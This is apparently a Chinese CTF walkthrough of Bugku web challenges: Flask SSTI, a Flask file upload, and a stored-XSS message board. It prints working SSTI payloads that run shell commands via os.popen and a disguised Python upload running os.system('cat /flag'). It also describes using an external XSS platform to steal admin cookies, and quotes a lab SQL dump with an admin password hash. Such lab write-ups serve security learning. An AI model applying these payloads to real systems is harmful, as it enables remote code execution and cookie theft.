当前位置：首页 > news >正文

[Bugku] web-CTF靶场详解！！！

news 2025/7/7 5:37:50

平台为“山东安信安全技术有限公司”自研CTF/AWD一体化平台，部分赛题采用动态FLAG形式，避免直接抄袭答案。

平台有题库、赛事预告、工具库、Writeup库等模块。

-------------------------------

Simple_SSTI_1

启动环境：

页面提示传入参数flag

F12查看源码得到第二个提示

SECRET_KEY(秘钥)是Flask中重要的一个配置值，在这题，构造语句查看它，得到flag

-------------------------------------------------

Simple_SSTI_2

启动环境：

页面提示传入参数flag

f12查看源码，发现没有提示信息。

通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}读取系统文件（读取网站系统目录），发现如下的文件夹：

通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}读取读取app目录下的文件，发现存在flag文件

通过{{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}读取flag内容，读取flag内容，最终得到flag

----------------------------------------

Flask_FileUpload

启动环境：

发现是上传文件

随便找张图片上传试试

查看源代码f12进入注释告诉我们，会运行python的文件

根据需求，编写代码写一个python代码改成jpg或者png格式的文件

import os
os.system('cat /flag')

上传看看在元素中即可查看flag

----------------------------------------

留言板：

开启环境：

提示需登录后台，需要使用python平台接收flag

打开场景后，出现了下面的界面。

看到此类的题目，应该和存储型xss有关，也就是将恶意代码保存到服务器端
即然在服务器端，那就是会在后台弹出窗口了
所以需要找到后台地址，看看能不能爆破进入，但是题目提示了说不需要登录后台，需要使用xss平台来接收cookies
测试一下script代码：

发现确实可以读取到。

使用目录扫描工具-御剑进行扫描试试

得到后台管理地址：/admin.php

          账号密码不知道？
          需要注意的是：该题目提示了无需登录后台！需要xss平台接收flag， http协议需要http协议的xss平台
           所以，我们需要找一个xss平台（https://xssaq.com/），目前我找到的这个是免费可用的，其他的都需要付费。

将项目中提供的代码输入留言板中：

在查看扫描出来的db.sql（本人没扫出来）不知道他们怎么扫出来的

# Host: localhost  (Version: 5.5.53)
# Date: 2019-08-04 16:13:22
# Generator: MySQL-Front 5.3  (Build 4.234)/*!40101 SET NAMES utf8 */;#
# Structure for table "text"
#CREATE DATABASE xss DEFAULT CHARACTER SET utf8;
use xss; DROP TABLE IF EXISTS `text`;
CREATE TABLE `text` (`Id` int(11) NOT NULL AUTO_INCREMENT,`text` varchar(255) DEFAULT NULL,PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;#
# Data for table "text"
#/*!40000 ALTER TABLE `text` DISABLE KEYS */;
/*!40000 ALTER TABLE `text` ENABLE KEYS */;#
# Structure for table "user"
#DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (`Id` int(11) NOT NULL AUTO_INCREMENT,`username` varchar(255) DEFAULT NULL,`password` varchar(255) DEFAULT NULL,PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;#
# Data for table "user"
#/*!40000 ALTER TABLE `user` DISABLE KEYS */;
INSERT INTO `user` VALUES (1,'admin','011be4d65feac1a8');
/*!40000 ALTER TABLE `user` ENABLE KEYS */;

底部存在一组 user passwd